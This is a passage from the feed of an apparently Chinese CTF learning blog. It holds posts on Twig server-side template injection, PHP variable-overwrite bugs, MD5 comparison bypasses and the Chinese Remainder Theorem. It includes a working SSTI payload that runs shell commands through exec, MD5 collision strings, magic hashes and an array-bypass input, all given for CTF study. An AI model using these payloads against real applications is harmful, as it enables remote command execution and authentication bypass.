class="line">先找到flag位置</span><br><span class="line">&#123;&#123;_self.env.registerUndefinedFilterCallback(&quot;exec&quot;)&#125;&#125;&#123;&#123;_self.env.getFilter(&quot;find / -name &#x27;f*&#x27;&quot;)&#125;&#125;</span><br><span class="line">再</span><br><span class="line">&#123;&#123;_self.env.registerUndefinedFilterCallback(&quot;exec&quot;)&#125;&#125;&#123;&#123;_self.env.getFilter(&quot;cat /flag&quot;)&#125;&#125;</span><br></pre></td></tr></table></figure><p>将Payload分成两部分来理解：<br /><code>&#123;&#123;_self.env.registerUndefinedFilterCallback("exec")&#125;&#125;</code><br /><code>&#123;&#123;_self.env.getFilter("cat /flag")&#125;&#125;</code></p><p>第一部分：设置恶意回调<br /><code>&#123;&#123;_self.env.registerUndefinedFilterCallback("exec")&#125;&#125;</code><br /><code>_self:</code><br />在<code>Twig</code>模板中，<code>_self</code>是一个特殊的变量，它指向当前的模板上下文（Twig\Template实例）。通过它可以访问到模板内部的一些方法和属性。<br /><code>_self.env:</code><br /><code>env</code>是<code>_self</code>的一个属性，它指的是<code>Twig</code>的环境对象（Twig\Environment实例）。这个对象包含了模板引擎的所有配置、扩展、过滤器、函数等全局信息。控制了它，就相当于控制了模板引擎的核心。<br /><code>registerUndefinedFilterCallback:</code><br />这是<code>Twig\Environment</code>对象的一个方法。<br />它的作用是：注册一个回调函数。当Twig在模板中遇到一个未被定义的过滤器时，就会自动调用这个注册好的回调函数，而不是直接抛错。</p><p>这行代码的执行结果是——告诉<code>Twig</code>引擎：“以后如果你遇到任何不认识的过滤器，别报错，去调用<code>exec</code>函数来处理”。</p><p>第二部分：触发命令执行<br /><code>&#123;&#123;_self.env.getFilter("cat /flag")&#125;&#125;</code></p><ol start="2"><li></li></ol><p>本文参考资料：<a href="https://hello-ctf.com/hc-web/ssti/#_3">SSTI 注入 - Hello CTF</a></p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/03/13/SSTI%E6%B3%A8%E5%85%A5/</id>
    <link href="https://cl1ck-t0.github.io/2026/03/13/SSTI%E6%B3%A8%E5%85%A5/"/>
    <published>2026-03-13T01:54:17.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>SSTI注入</title>
    <updated>2026-03-22T06:38:17.172Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="web漏洞" scheme="https://cl1ck-t0.github.io/tags/web%E6%BC%8F%E6%B4%9E/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="变量覆盖漏洞"><a class="markdownIt-Anchor" href="#变量覆盖漏洞"></a> 变量覆盖漏洞</h1><p>引入题：[MoeCTF 2022]ezphp</p><h2 id="一-概念"><a class="markdownIt-Anchor" href="#一-概念"></a> 一、概念</h2><p>变量覆盖漏洞是指攻击者使用自定义的变量去覆盖源代码中的变量，从而改变代码逻辑，实现攻击目的的一种漏洞。通常来说，单独的变量覆盖漏洞很难有利用价值，但是在与其他应用代码或漏洞结合后，可能会有很大的影响。</p><h2 id="二-变量覆盖漏洞相关的函数"><a class="markdownIt-Anchor" href="#二-变量覆盖漏洞相关的函数"></a> 二、 变量覆盖漏洞相关的函数</h2><p>变量覆盖漏洞大多数由函数使用不当导致，经常引发变量覆盖漏洞的函数有：</p><ul><li>extract()</li><li>parse_str()</li><li>import_request_variables()</li><li><p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mrow><mo stretchy="false">(</mo><mtext>可变变量</mtext><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">(可变变量)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mopen">(</span><span class="mord cjk_fallback">可变变量</span><span class="mclose">)</span></span></span></span></span></p></li></ul><h2 id="三-详细说明"><a class="markdownIt-Anchor" href="#三-详细说明"></a> 三、详细说明</h2><p>接下来，我将逐步说明变量覆盖漏洞函数</p><h3 id="1extract变量覆盖"><a class="markdownIt-Anchor" href="#1extract变量覆盖"></a> 1.extract()变量覆盖</h3><p>emmmmmm，其实窝没见过doge</p><p>但是这里网上找资料补充一下：</p><p>extract() 函数从数组中将变量导入到当前的符号表。</p><p>该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。</p><p>实例：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a = &quot;Original&quot;;</span><br><span class="line">$my_array = array(&quot;a&quot; =&gt; &quot;Cat&quot;,&quot;b&quot; =&gt; &quot;Dog&quot;, &quot;c&quot; =&gt; &quot;Horse&quot;);</span><br><span class="line">extract($my_array);</span><br><span class="line">echo &quot;\$a = $a; \$b = $b; \$c = $c&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>//运行结果：$a = Cat; $b = Dog; $c = Horse（Cat将Original覆盖了）</p><p><a href="https://blog.csdn.net/qq_45521281/article/details/105849770">参考资料</a></p><h3 id="2变量覆盖重点"><a class="markdownIt-Anchor" href="#2变量覆盖重点"></a> 2.$$变量覆盖（重点）</h3><p>由$$定义的变量为可变变量。就是说，一个变量的变量名可以动态的设置和使用。一个可变变量获取了一个普通变量的值作为这个可变变量的变量名。</p><p>这个比较常见，我们详细展开一下，以ezphp为例说明一下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">highlight_file(&#x27;source.txt&#x27;);</span><br><span class="line">echo &quot;&lt;br&gt;&lt;br&gt;&quot;;</span><br><span class="line"></span><br><span class="line">$flag = &#x27;xxxxxxxx&#x27;;</span><br><span class="line">$giveme = &#x27;can can need flag!&#x27;;</span><br><span class="line">$getout = &#x27;No! flag.Try again. Come on!&#x27;;</span><br><span class="line">if(!isset($_GET[&#x27;flag&#x27;]) &amp;&amp; !isset($_POST[&#x27;flag&#x27;]))&#123;</span><br><span class="line">  exit($giveme);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if($_POST[&#x27;flag&#x27;] === &#x27;flag&#x27; || $_GET[&#x27;flag&#x27;] === &#x27;flag&#x27;)&#123;</span><br><span class="line">  exit($getout);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">foreach ($_POST as $key =&gt; $value) &#123;</span><br><span class="line">  $$key = $value;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">foreach ($_GET as $key =&gt; $value) &#123;</span><br><span class="line">  $$key = $$value;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">echo &#x27;the flag is : &#x27; . $flag;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p><strong>漏洞产生:</strong></p><p>使用foreach来遍历数组中的值，然后再将获取到的<strong>数组键名作为变量名</strong>，数组中的<strong>键值作为变量的值</strong>。因此就产生了变量覆盖漏洞。请求<code>?flag=a</code> 会将<code>$flag</code>的值覆盖，$flag=a。</p><h3 id="3parse_str导致的变量覆盖"><a class="markdownIt-Anchor" href="#3parse_str导致的变量覆盖"></a> 3.parse_str()导致的变量覆盖</h3><p>parse_str(string,array)函数把**查询字符串解析到变量中。 **</p><p>array参数规定存储变量的数组名称。该参数指示变量存储到一个指定的数组中。</p><p>注释：如果未设置 array 参数，由该函数设置的变量将覆盖已存在的同名变量。</p><p>查询字符串（URL参数）是指在URL的末尾加上用于向服务器 发送信息的字符串（变量）。将“？”放在URL的末尾，然后再加上“参数＝值”，想加上多个参数的话，使用“&amp;”。以这个形式，可以将想要发送给服务器的数据添加到URL中。</p><p><strong>parse_str函数的作用就是解析字符串并注册成变量，在注册变量之前不会验证当前变量是否存在，所以直接覆盖掉已有变量</strong></p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/03/05/%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96%E6%BC%8F%E6%B4%9E/</id>
    <link href="https://cl1ck-t0.github.io/2026/03/05/%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96%E6%BC%8F%E6%B4%9E/"/>
    <published>2026-03-05T14:42:30.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>变量覆盖漏洞</title>
    <updated>2026-03-06T07:49:40.501Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="MD5碰撞" scheme="https://cl1ck-t0.github.io/tags/MD5%E7%A2%B0%E6%92%9E/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="md5碰撞"><a class="markdownIt-Anchor" href="#md5碰撞"></a> MD5碰撞</h1><p>经典例题：[NISACTF 2022]level-up</p><h2 id="一-定义"><a class="markdownIt-Anchor" href="#一-定义"></a> 一、定义</h2><ul><li>md5是一种加密算法，并且<code>不能防止碰撞破解</code>。</li><li>md5加密是不可逆的，这就意味着有两串不同的字符串加密出来的内容却是相同的</li><li>加密过程简单，碰撞还原字符难</li></ul><h2 id="二-php弱比较"><a class="markdownIt-Anchor" href="#二-php弱比较"></a> 二、PHP弱比较</h2><p>弱比较还要区分与<code>字符串类型比较</code>还是与<code>int类型比较</code></p><p>eg.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">var_dump(&quot;123a&quot;==123)</span><br><span class="line">var_dump(&quot;123a&quot;==&quot;123&quot;)</span><br></pre></td></tr></table></figure><p>对于上述结果为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">True</span><br><span class="line">False</span><br></pre></td></tr></table></figure><h3 id="1字符串与int类型比较"><a class="markdownIt-Anchor" href="#1字符串与int类型比较"></a> 1.字符串与int类型比较:</h3><p>PHP规定当进行字符串与数字的弱比较时，会进行如下步骤：</p><p>先看字符串开头是否为数字，如果为数字，则截止到连续数字的最后一个数字，即&quot;123abc456&quot;=&gt;123</p><p>如果开头不为数字，则判断为false，即0。</p><h3 id="2字符串与字符串比较"><a class="markdownIt-Anchor" href="#2字符串与字符串比较"></a> 2.字符串与字符串比较：</h3><p>因为这个是字符串之间进行比较，想要绕过这个弱比较只能用0e的方式。</p><p>在PHP中&quot;0e&quot;判断为科学计数法，0e123就是0的10123次方</p><p>不难推出：0e123456789==0e1 // 因为0的任意次方都为0</p><p>不过有一个注意点：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;0e123456&quot;==&quot;0e345&quot; //True</span><br><span class="line">&quot;0e12adfc&quot;==&quot;0e345&quot; //False</span><br></pre></td></tr></table></figure><p>eg.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &quot;flag.php&quot;;</span><br><span class="line">$md5_1=$_GET[&#x27;md5_1&#x27;];</span><br><span class="line">$md5_2=$_GET[&#x27;md5_2&#x27;];</span><br><span class="line">if(md5($md5_1)==md5($md5_2) &amp; $md5_1 != $md5_2)</span><br><span class="line">&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    echo &quot;try harder&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>这里列举一些字符串不同开头为0e，哈希值为0e开头的例子：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">0e215962017 0e291242476940776845150308577824</span><br><span class="line"></span><br><span class="line">0e1284838308 0e708279691820928818722257405159</span><br><span class="line"></span><br><span class="line">0e1137126905 0e291659922323405260514745084877</span><br><span class="line"></span><br><span class="line">0e807097110 0e318093639164485566453180786895</span><br><span class="line"></span><br><span class="line">0e730083352 0e870635875304277170259950255928</span><br></pre></td></tr></table></figure><h2 id="三-md5强比较"><a class="markdownIt-Anchor" href="#三-md5强比较"></a> 三、MD5强比较</h2><p>以[NISACTF 2022]level-up的level-2为例：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//here is level 2</span><br><span class="line">error_reporting(0);</span><br><span class="line">include &quot;str.php&quot;;</span><br><span class="line">if (isset($_POST[&#x27;array1&#x27;]) &amp;&amp; isset($_POST[&#x27;array2&#x27;]))&#123;</span><br><span class="line">    $a1 = (string)$_POST[&#x27;array1&#x27;];</span><br><span class="line">    $a2 = (string)$_POST[&#x27;array2&#x27;];</span><br><span class="line">    if ($a1 == $a2)&#123;</span><br><span class="line">        die(&quot;????&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    if (md5($a1) === md5($a2))&#123;</span><br><span class="line">        echo $level3;</span><br><span class="line">    &#125;</span><br><span class="line">    else&#123;</span><br><span class="line">        die(&quot;level 2 failed ...&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><ul><li>题目要求POST传入array1和array2，且array1、array2是md5强碰撞（即array1、array2不等但他们的md5散列值完全相等）两串不一样的字符，加密结果却相同：</li></ul><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">array1=psycho%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00W%ADZ%AF%3C%8A%13V%B5%96%18m%A5%EA2%81_%FB%D9%24%22%2F%8F%D4D%A27vX%B8%08%D7m%2C%E0%D4LR%D7%FBo%10t%19%02%82%7D%7B%2B%9Bt%05%FFl%AE%8DE%F4%1F%84%3C%AE%01%0F%9B%12%D4%81%A5J%F9H%0FyE%2A%DC%2B%B1%B4%0F%DEcC%40%DA29%8B%C3%00%7F%8B_h%C6%D3%8Bd8%AF%85%7C%14w%06%C2%3AC%BC%0C%1B%FD%BB%98%CE%16%CE%B7%B6%3A%F3%99%B59%F9%FF%C2&amp;array2=psycho%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00W%ADZ%AF%3C%8A%13V%B5%96%18m%A5%EA2%81_%FB%D9%A4%22%2F%8F%D4D%A27vX%B8%08%D7m%2C%E0%D4LR%D7%FBo%10t%19%02%02%7E%7B%2B%9Bt%05%FFl%AE%8DE%F4%1F%04%3C%AE%01%0F%9B%12%D4%81%A5J%F9H%0FyE%2A%DC%2B%B1%B4%0F%DEc%C3%40%DA29%8B%C3%00%7F%8B_h%C6%D3%8Bd8%AF%85%7C%14w%06%C2%3AC%3C%0C%1B%FD%BB%98%CE%16%CE%B7%B6%3A%F3%9959%F9%FF%C2</span><br></pre></td></tr></table></figure><p>再给一组:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2</span><br><span class="line"></span><br><span class="line">$b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2</span><br></pre></td></tr></table></figure><p>上述题目由于有对数组转换为字符串的强制过滤，所以不能使用数组绕过QAQ</p><p>数组绕过eg</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &quot;flag.php&quot;;</span><br><span class="line">$md5_1=$_GET[&#x27;md5_1&#x27;];</span><br><span class="line">$md5_2=$_GET[&#x27;md5_2&#x27;];</span><br><span class="line">if(md5($md5_1)===md5($md5_2) &amp; $md5_1 != $md5_2)</span><br><span class="line">&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    echo &quot;try harder&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">md5_1[]=1&amp;md5_2[]=2</span><br></pre></td></tr></table></figure><p>原理：PHP对无法md5加密的东西不加密，结果为NULL，虽然会报错，但是null=null，逻辑关系为True。</p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/03/01/MD5/</id>
    <link href="https://cl1ck-t0.github.io/2026/03/01/MD5/"/>
    <published>2026-03-01T13:01:37.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>MD5</title>
    <updated>2026-03-01T14:29:41.091Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="crypto" scheme="https://cl1ck-t0.github.io/tags/crypto/"/>
    <category term="RSA" scheme="https://cl1ck-t0.github.io/tags/RSA/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="crt中国剩余定理"><a class="markdownIt-Anchor" href="#crt中国剩余定理"></a> CRT(中国剩余定理)</h1><h2 id="一-引入"><a class="markdownIt-Anchor" href="#一-引入"></a> 一、引入</h2><blockquote><p>有物不知其数，三三数之剩二，五五数之剩三，七七数之剩二．问物几何？</p></blockquote><p>即求满足以下条件的整数：除以 3<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="3" /> 余 2<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="2" />，除以 5<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="5" /> 余 3<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="3" />，除以 7<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="7" /> 余 2<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="2" />．</p><blockquote><p>三人同行七十希，五树梅花廿一支，七子团圆正半月，除百零五便得知．</p></blockquote><p>2 ×70 +3 ×21 +2 ×15 =233 =2 ×105 +23<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="2imes 70+3imes 21+2imes 15=233=2imes 105+23" />，故答案为 23<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="23" />．</p><p>为何呢：</p><p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mrow><mn>70</mn><mo>≡</mo><mn>1</mn><mo stretchy="false">(</mo><mi>m</mi><mi>o</mi><mi>d</mi><mn>3</mn><mo stretchy="false">)</mo><mn>70</mn><mo>≡</mo><mn>1</mn><mo stretchy="false">(</mo><mi>m</mi><mi>o</mi><mi>d</mi><mn>3</mn><mo stretchy="false">)</mo><mtext>，</mtext><mn>21</mn><mo>≡</mo><mn>1</mn><mo stretchy="false">(</mo><mi>m</mi><mi>o</mi><mi>d</mi><mn>5</mn><mo stretchy="false">)</mo><mn>21</mn><mo>≡</mo><mn>1</mn><mo stretchy="false">(</mo><mi>m</mi><mi>o</mi><mi>d</mi><mn>5</mn><mo stretchy="false">)</mo><mo separator="true">,</mo><mn>15</mn><mo>≡</mo><mn>1</mn><mo stretchy="false">(</mo><mi>m</mi><mi>o</mi><mi>d</mi><mn>7</mn><mo stretchy="false">)</mo><mn>15</mn><mo>≡</mo><mn>1</mn><mo stretchy="false">(</mo><mi>m</mi><mi>o</mi><mi>d</mi><mn>7</mn><mo stretchy="false">)</mo><mo separator="true">,</mo><mn>105</mn><mo>=</mo><mn>3</mn><mo>×</mo><mn>5</mn><mo>×</mo><mn>7</mn><mtext>（模数的乘积）</mtext></mrow><annotation encoding="application/x-tex">70≡1(mod3)70≡1(mod3)，21≡1(mod5)21≡1(mod5),15≡1(mod7)15≡1(mod7),105=3×5×7（模数的乘积）</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6444em;"></span><span class="mord">70</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">1</span><span class="mopen">(</span><span class="mord mathnormal">m</span><span class="mord mathnormal">o</span><span class="mord mathnormal">d</span><span class="mord">3</span><span class="mclose">)</span><span class="mord">70</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">1</span><span class="mopen">(</span><span class="mord mathnormal">m</span><span class="mord mathnormal">o</span><span class="mord mathnormal">d</span><span class="mord">3</span><span class="mclose">)</span><span class="mord cjk_fallback">，</span><span class="mord">21</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">1</span><span class="mopen">(</span><span class="mord mathnormal">m</span><span class="mord mathnormal">o</span><span class="mord mathnormal">d</span><span class="mord">5</span><span class="mclose">)</span><span class="mord">21</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">1</span><span class="mopen">(</span><span class="mord mathnormal">m</span><span class="mord mathnormal">o</span><span class="mord mathnormal">d</span><span class="mord">5</span><span class="mclose">)</span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em;"></span><span class="mord">15</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">1</span><span class="mopen">(</span><span class="mord mathnormal">m</span><span class="mord mathnormal">o</span><span class="mord mathnormal">d</span><span class="mord">7</span><span class="mclose">)</span><span class="mord">15</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">1</span><span class="mopen">(</span><span class="mord mathnormal">m</span><span class="mord mathnormal">o</span><span class="mord mathnormal">d</span><span class="mord">7</span><span class="mclose">)</span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em;"></span><span class="mord">105</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:0.7278em;vertical-align:-0.0833em;"></span><span class="mord">3</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em;"></span></span><span class="base"><span class="strut" style="height:0.7278em;vertical-align:-0.0833em;"></span><span class="mord">5</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em;"></span></span><span class="base"><span class="strut" style="height:0.6833em;"></span><span class="mord">7</span><span class="mord cjk_fallback">（模数的乘积）</span></span></span></span></span></p><h2 id="二-定义"><a class="markdownIt-Anchor" href="#二-定义"></a> 二、定义</h2><p>中国剩余定理 (Chinese Remainder Theorem, CRT) 可求解如下形式的一元线性同余方程组（其中 𝑛1,𝑛2,⋯,𝑛𝑘<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="n_1, n_2, dots, n_k" /> 两两互质）：</p><p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mrow><mo fence="true">{</mo><mtable rowspacing="0.36em" columnalign="left left" columnspacing="1em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="false"><mrow><mi>x</mi><mo>≡</mo><msub><mi>a</mi><mn>1</mn></msub><mspace></mspace><mspace width="0.4444em"/><mo stretchy="false">(</mo><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow><mspace width="0.3333em"/><msub><mi>n</mi><mn>1</mn></msub><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="false"><mrow><mi>x</mi><mo>≡</mo><msub><mi>a</mi><mn>2</mn></msub><mspace></mspace><mspace width="0.4444em"/><mo stretchy="false">(</mo><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow><mspace width="0.3333em"/><msub><mi>n</mi><mn>2</mn></msub><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="false"><mrow><mspace width="1em"/><mrow><mi mathvariant="normal">⋮</mi><mpadded height="0em" voffset="0em"><mspace mathbackground="black" width="0em" height="1.5em"></mspace></mpadded></mrow></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="false"><mrow><mi>x</mi><mo>≡</mo><msub><mi>a</mi><mi>k</mi></msub><mspace></mspace><mspace width="0.4444em"/><mo stretchy="false">(</mo><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow><mspace width="0.3333em"/><msub><mi>n</mi><mi>k</mi></msub><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr></mtable></mrow><annotation encoding="application/x-tex">\begin{cases}x \equiv a_1 \pmod{n_1} \\x \equiv a_2 